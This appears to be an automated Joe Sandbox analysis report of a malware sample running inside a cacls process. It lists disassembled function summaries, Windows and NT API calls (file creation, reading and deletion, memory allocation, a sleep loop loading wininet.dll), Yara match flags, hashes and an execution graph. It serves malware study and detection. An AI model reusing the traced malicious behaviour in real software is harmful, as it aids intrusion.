                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: ba035766cc1ec2b9c0fdb12e7a1eee0b090a7cf5808ca48739084fb76cc4d10a
                                                            • Instruction ID: a38fd9c506b608133f0c863a6c26781efa9e5a05588b0c72c9eff041f4dd2ce3
                                                            • Opcode Fuzzy Hash: ba035766cc1ec2b9c0fdb12e7a1eee0b090a7cf5808ca48739084fb76cc4d10a
                                                            • Instruction Fuzzy Hash: D64101357007038BD720DE28CD42F6AB7E5EB98720F100A1DF99A9B380DB70E805DB91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01007294
                                                            • RTL: Resource at %p, xrefs: 010072A3
                                                            • RTL: Re-Waiting, xrefs: 010072C1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction ID: 99262aa43bc31bfae7c68b4f20eec6bceacfb4642585526608bc127cb133a191
                                                            • Opcode Fuzzy Hash: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction Fuzzy Hash: 63412036704207ABD721DE24CC42FAAB7A5FB54710F100619F9C9AB281DB39F8029BD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction ID: d471fd314324be9d19b35db5a02c20ffd5fd43015884da4f72095c2b6b3c04d6
                                                            • Opcode Fuzzy Hash: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction Fuzzy Hash: CE318772A002199FDB60DF29DC80BEE77F8EB44611F4545A6F989D3241EB30AA449F60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 133db16d12636160b5ea82114bcac00743c6155591020bc13e51d3af50908efa
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: C8918471E083169ADB24EF59C8816BEB7A3AF44360F5C451BE855AB380E6349D41A750
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction ID: 6b2d9cd1cb083571a1dda2fbc043fdb54b1fb6163edc31767cf78c6a0c0edea6
                                                            • Opcode Fuzzy Hash: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction Fuzzy Hash: 7B813A72D042699BDB31CF54CC45BEEB7B8AF48710F0541EAAA09B7290D7749E84DFA0

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                            Signature Coverage:2.2%
                                                            Total number of Nodes:452
                                                            Total number of Limit Nodes:74
101863->101829 101865 bf38de 101864->101865 101865->101829 101867 bea496 101866->101867 101880 bedeb0 101867->101880 101869 bea508 101871 bea690 101869->101871 101872 bea526 101869->101872 101870 bea675 101870->101829 101871->101870 101873 bea330 RtlFreeHeap 101871->101873 101872->101870 101885 bea330 101872->101885 101873->101871 101876 bea806 101875->101876 101877 bedeb0 RtlFreeHeap 101876->101877 101878 bea88d 101877->101878 101878->101831 101879->101856 101882 bedecf 101880->101882 101881 bedee1 101881->101869 101882->101881 101883 bfb960 RtlFreeHeap 101882->101883 101884 bedf24 101883->101884 101884->101869 101886 bea34d 101885->101886 101889 bedf40 101886->101889 101888 bea453 101888->101872 101890 bedf64 101889->101890 101891 bee00e 101890->101891 101892 bfb960 RtlFreeHeap 101890->101892 101891->101888 101892->101891 101893 bf8cd0 101894 bf8d5f 101893->101894 101896 bf8cfb 101893->101896 101898 3852ee0 LdrInitializeThunk 101894->101898 101895 bf8d90 101898->101895 101899 bf96d0 101900 bf977a 101899->101900 101902 bf96fe 101899->101902 101901 bf9790 NtReadFile 101900->101901 101903 bf6410 101904 bf646a 101903->101904 101906 bf6477 101904->101906 101907 bf3e10 101904->101907 101908 bfb8d0 NtAllocateVirtualMemory 101907->101908 101909 bf3e51 101908->101909 101910 be4890 LdrLoadDll 101909->101910 101912 bf3f5e 101909->101912 101913 bf3e97 101910->101913 101911 bf3ee0 Sleep 101911->101913 101912->101906 101913->101911 101913->101912 101914 bf8e50 101915 bf8e6a 101914->101915 101918 3852df0 LdrInitializeThunk 101915->101918 101916 bf8e92 101918->101916 101919 bf97d0 101920 bf9847 101919->101920 101922 bf97fb 101919->101922 101921 bf985d NtDeleteFile 101920->101921 101923 bf1b10 101924 bf1b2c 101923->101924 101925 bf1b68 101924->101925 101926 bf1b54 101924->101926 101927 bf9870 NtClose 101925->101927 101928 bf9870 NtClose 101926->101928 101929 bf1b71 101927->101929 101930 bf1b5d 101928->101930 101933 bfba80 RtlAllocateHeap 101929->101933 101932 bf1b7c 
101933->101932 101934 be2a8c 101935 be2ab8 101934->101935 101936 be6610 2 API calls 101935->101936 101937 be2ac3 101936->101937 101939 be7480 101940 be749c 101939->101940 101944 be74ef 101939->101944 101942 bf9870 NtClose 101940->101942 101940->101944 101941 be7627 101943 be74b7 101942->101943 101949 be68a0 NtClose LdrInitializeThunk LdrInitializeThunk 101943->101949 101944->101941 101950 be68a0 NtClose LdrInitializeThunk LdrInitializeThunk 101944->101950 101946 be7601 101946->101941 101951 be6a70 NtClose LdrInitializeThunk LdrInitializeThunk 101946->101951 101949->101944 101950->101946 101951->101941 101952 be5f00 101953 be8450 LdrInitializeThunk 101952->101953 101955 be5f30 101952->101955 101953->101955 101956 be5f5c 101955->101956 101957 be83d0 101955->101957 101958 be8414 101957->101958 101963 be8435 101958->101963 101964 bf8b70 101958->101964 101960 be8425 101961 be8441 101960->101961 101962 bf9870 NtClose 101960->101962 101961->101955 101962->101963 101963->101955 101965 bf8bf0 101964->101965 101967 bf8b9e 101964->101967 101969 3854650 LdrInitializeThunk 101965->101969 101966 bf8c15 101966->101960 101967->101960 101969->101966 101970 bec940 101972 bec969 101970->101972 101971 beca6d 101972->101971 101973 beca13 FindFirstFileW 101972->101973 101973->101971 101974 beca2e 101973->101974 101975 beca54 FindNextFileW 101974->101975 101975->101974 101976 beca66 FindClose 101975->101976 101976->101971 101977 bfb640 101978 bfb64b 101977->101978 101979 bfb66a 101978->101979 101981 bf5e90 101978->101981 101982 bf5ef2 101981->101982 101984 bf5eff 101982->101984 101985 be2620 101982->101985 101984->101979 101986 be25ee 101985->101986 101989 be25e6 101985->101989 101987 bf8ea0 LdrInitializeThunk 101986->101987 101988 be25f2 101987->101988 101993 bf9900 101988->101993 101989->101988 101991 bf8ea0 LdrInitializeThunk 101989->101991 101992 be260b 101989->101992 101991->101988 101992->101984 101994 bf998f 101993->101994 101995 bf992b 101993->101995 101998 3852e80 
LdrInitializeThunk 101994->101998 101995->101992 101996 bf99c0 101996->101992 101998->101996

                                                            Control-flow Graph (graph image not reproduced; legend: Executed, Not Executed)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "n$)t$,$/a$8n$=G$@$B`$PY$Pq$Yu$Z4$jJ$m@$p$us$x`$z)$z`$q$~
                                                            • API String ID: 0-299318214
                                                            • Opcode ID: 54d11158f4db1bac9fbaf24f5e08f859bcecdff9bbbdeb3dbff5851b0a23cc05
                                                            • Instruction ID: 87f94d0d4ab9c2e106bb2ee5af64771925c7f47aab2b692f70b77f95c658afc2
                                                            • Opcode Fuzzy Hash: 54d11158f4db1bac9fbaf24f5e08f859bcecdff9bbbdeb3dbff5851b0a23cc05
                                                            • Instruction Fuzzy Hash: 5722A2B0D05229CBEB24CF45C894BDDFBB2BB44308F1081DAC549AB380E7B55A88DF65
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BECA24
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00BECA5F
                                                            • FindClose.KERNELBASE(?), ref: 00BECA6A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                            • Instruction ID: 884657bf1191c358b7589d3a36bf56597bf85036d74814f0bfa400f1666a772d
                                                            • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                            • Instruction Fuzzy Hash: 4B316071A0034CBBDB20DBA5CC85FFF77BCDB44745F104598BA09A7181DB70AA858BA0
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 00BF9661
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                            • Instruction ID: 45b142e2bfd7b71e4eafd1614e63dc1ae3fb17d5082cee20caed1b12496e68f3
                                                            • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                            • Instruction Fuzzy Hash: A231C0B5A01248ABDB14DF98D881EEFB7F9AF8C304F108259F909A7340D770A955CFA5
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 00BF97B9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                            • Instruction ID: 89fbb0712b9d43f74f9d2187a4d7f8c21d766e66fa6ec5fea73a1f1e3c291006
                                                            • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                            • Instruction Fuzzy Hash: 6031D3B5A00209AFDB14DF98D881EEFB7F9EF88314F108259F919A7340D770A9158FA1
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00BE209E,?,00BF834F,C3714B7A,00000004,00003000,?,?,?,?,?,00BF834F,00BE209E,00BFB901,00BF834F,520F8B51), ref: 00BF9A98
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                            • Instruction ID: f177a3088bf2b0bae4c3eb77287a44d804bbd68714a3aa6894cbc14e515d8b2e
                                                            • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                            • Instruction Fuzzy Hash: 212108B5A00609ABDB14DF98DC81EEFB7F9EF88710F108149FA19A7340D770A915CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                            • Instruction ID: bf609634d8c862df174a0c20856ba55274a61f956ae3f72ba1a39d83cc4ab445
                                                            • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                            • Instruction Fuzzy Hash: 54119171600208BBD620EAA8CC42FEBB7ACDF85714F108149FA0957281E7716A19CBE1
                                                            APIs
                                                            • NtClose.NTDLL(?,00BE3443,001F0001,?,00000000,?,?,00000104), ref: 00BF98A4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction ID: 4a4d2d2d366eda00975baa4b939cf7966a4bd84eefa1e5c7a56d74a6676cac2a
                                                            • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction Fuzzy Hash: 31E046762102187BC220AA69DC01FEBB7ACEBC5760F008455FA08A7242CA70BA558BF1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                            • Instruction ID: 0e35be2d197d57f5d7772dcf9ed2deb12c408a3d3dac5e156efc031f387e2205
                                                            • Opcode Fuzzy Hash: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                            • Instruction Fuzzy Hash: 67900271605804169140B1984C84646400597E0302B65C051E5468554C8B148A5A5362
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                            • Instruction ID: 7919a1ef0afd5d91987b6e8bb5a4990d4fabe10f8bb14ecd3245f8bbd98e34ec
                                                            • Opcode Fuzzy Hash: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                            • Instruction Fuzzy Hash: C69002A1601504464140B1984C04506600597E13023A5C155A5598560C87188959926A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3f54db308791ff808d6b01d5b6d198070c09c2322887a6e48cb5aad2a6fa8ec1
                                                            • Instruction ID: a3f6501c17b597b9ddc8d8edf8c3524291b25547a87c820e519c5fbc7ba99cf8
                                                            • Opcode Fuzzy Hash: 3f54db308791ff808d6b01d5b6d198070c09c2322887a6e48cb5aad2a6fa8ec1
                                                            • Instruction Fuzzy Hash: FC90027160540C06D150B1984814746000587D0302F65C051A5068654D87558B5976A2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0a77f9dbf968bbdfce8bc67376fcff2ef0c1d95152efe9544dc12fc838d2e2d0
                                                            • Instruction ID: 515074f15f877d45757fa6ed45f1773e6b6478418921d97e044332f709653f2c
                                                            • Opcode Fuzzy Hash: 0a77f9dbf968bbdfce8bc67376fcff2ef0c1d95152efe9544dc12fc838d2e2d0
                                                            • Instruction Fuzzy Hash: 2690027120544C46D140B1984804B46001587D0306F65C051A50A8694D97258E59B662
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 06a8c900ed5d7afc3ef6d3989b9d45991f95ed10e7ada281fc2005871499e4cc
                                                            • Instruction ID: 7077171c614922e3bee0378873231b3e21ea1416c852d29a703fa9e6bda95b91
                                                            • Opcode Fuzzy Hash: 06a8c900ed5d7afc3ef6d3989b9d45991f95ed10e7ada281fc2005871499e4cc
                                                            • Instruction Fuzzy Hash: 5E90027120140C06D180B198480474A000587D1302FA5C055A5069654DCB158B5D77A2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 bf3e10-bf3e58 call bfb8d0 437 bf3e5e-bf3ed8 call bfb9b0 call be4890 call bd13e0 call bf1fe0 434->437 438 bf3f64-bf3f6a 434->438 447 bf3ee0-bf3ef4 Sleep 437->447 448 bf3ef6-bf3f08 447->448 449 bf3f55-bf3f5c 447->449 450 bf3f2a-bf3f43 call bf6370 448->450 451 bf3f0a-bf3f28 call bf62d0 448->451 449->447 452 bf3f5e 449->452 456 bf3f48-bf3f4b 450->456 451->456 452->438 456->449
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00BF3EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: i:4$net.dll$wininet.dll
                                                            • API String ID: 3472027048-2634764057
                                                            • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                            • Instruction ID: 8b19cb652357177c1c319e7fd3531e93170f1b5734f0f7b6e36c1e2d3bb1be18
                                                            • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                            • Instruction Fuzzy Hash: 1E314DB1A00709BBD714DFA4D881FEAB7F8EB88710F008559BA596B241D7B06B44CBA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 457 be0ffc-be1016 458 be1019-be1054 457->458 459 be1056 458->459 460 be10b4-be110a call be4890 call bd13e0 call bf1fe0 458->460 462 be1057-be1058 459->462 477 be110c-be111b PostThreadMessageW 460->477 478 be112a-be1130 460->478 464 be105a-be106c 462->464 465 be1084 462->465 464->458 472 be106e-be1075 464->472 465->462 466 be1085-be1087 465->466 469 be1089-be1090 466->469 470 be1091 466->470 469->470 474 be1077-be1080 472->474 475 be1082-be1083 472->475 474->475 475->465 477->478 479 be111d-be1127 477->479 479->478
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                            • Instruction ID: a5f9ce71aeec62dd5d9ab2f21eb474973ece6a6dc27e8c9b21a2f7eabd3b04bf
                                                            • Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                            • Instruction Fuzzy Hash: BB31C372A052D47B8B01DB7A9C42DEDBBE8EE523A471445E9FE449B102D7368D03CBD1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 480 be1097-be10b2 481 be10ba-be10d2 call bfc410 480->481 482 be10b5 call bfba00 480->482 485 be10d8-be110a call bd13e0 call bf1fe0 481->485 486 be10d3 call be4890 481->486 482->481 491 be110c-be111b PostThreadMessageW 485->491 492 be112a-be1130 485->492 486->485 491->492 493 be111d-be1127 491->493 493->492
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction ID: 1696fbb01f65d290a53f6d326d6a2e2f70f51365eb973a0587d8da91998a482f
                                                            • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction Fuzzy Hash: 4311C6B1D4025C7EDB119AE48C82DEFBBBCEF016A4F0185A9F654A7141E6345E068BA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 494 be10a0-be10d2 call bfba00 call bfc410 499 be10d8-be110a call bd13e0 call bf1fe0 494->499 500 be10d3 call be4890 494->500 505 be110c-be111b PostThreadMessageW 499->505 506 be112a-be1130 499->506 500->499 505->506 507 be111d-be1127 505->507 507->506
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction ID: 567bf2c709d264fa9b79852900b76e6d47e33e7b9d7b32a97abe4df7c3d221a1
                                                            • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction Fuzzy Hash: A40184B1D0025C7ADB11AAE58C82DEFBBBCDF416D4F0484A4FA54A7141E6785E0687B1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                            • Instruction ID: 17aead403202c55b46d6bc693a6e484743e2285b1560d660ba510a71aae9fa44
                                                            • Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                            • Instruction Fuzzy Hash: 68314175A0020AAFDB00DFD9D8809EEB3B9FF88304B108599E545AB215D771EE058BA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
